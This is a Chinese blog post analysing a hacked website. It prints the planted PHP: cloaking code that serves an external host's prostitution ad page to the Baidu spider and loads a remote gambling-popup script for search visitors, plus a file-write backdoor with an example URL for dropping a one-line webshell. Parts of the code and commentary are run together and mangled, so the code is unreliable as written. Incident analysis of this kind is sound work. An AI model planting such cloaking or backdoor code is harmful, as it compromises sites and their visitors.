<?phpif (ereg("http://www.baidu.com/search/spider.htm", $_SERVER ["HTTP_USER_AGENT"])) {$file = file_get_contents('http://z.*****.com/jie/70.html');echo $file;exit;}if(stristr ($_SERVER['HTTP_REFERER'],"http://www.baidu.com")) {echo "<script language='JAVAscript' src=https://www.isolves.com/it/aq/mm/2022-11-24/'http://z.sloufeng.com/jc.js'>简单分析一下,这已经是最简单的劫持代码了,判断user-aget 如果是百度蜘蛛,把网页:http://z.******.com/jie/70.html内容输出,没错,这里面就是你想要的凤楼信息;然后判断referer是否为www.baidu.com,是的话加载下面的js,这个js里面又是一层判断,弹出其他页面,反正就是业务繁多,还有菠菜等页面 。
";exit;}?>
其实我没有找太多相关的php文件,因为很明显这个马就是批量实现的,程序也不会智能的过分把马藏那么深,数据库文件肯定要加载的,结果就在里面,而且都没有加密,差评!
第四步:找shell下面就是找shell了,我没有详细的去找,只是在同目录下发现一个后门,挺简单 的
<?php$dq = fopen($_SERVER["DOCUMENT_ROOT"].'/config/jc.php','w+');fwrite($dq,$_GET['msg']);?>
www.xxx.com/config/file.php?msg=一句话木马
这样就将一句话写到该目录下jc.php
题外话:这个凤楼广告竟然没有放任何联系方式和网址!意义何在?差评!
先就这些吧
推荐阅读
- 求职招聘网站哪个靠谱 网上找工作最佳网站
- 网站记录怎么打开?
- 如何在投稿客网站上投稿
- 网购手机安全吗?网购手机哪个网站好?
- 飞歌官方网站验证~飞歌导航网站
- 相亲网站到底有多“坑爹”
- 每个程序员都要知道的一个网站
- IT学什么就业好
- 电影|相见恨晚! 为什么不早知道这些网站
- 网站关键词排名怎么优化更持久、稳定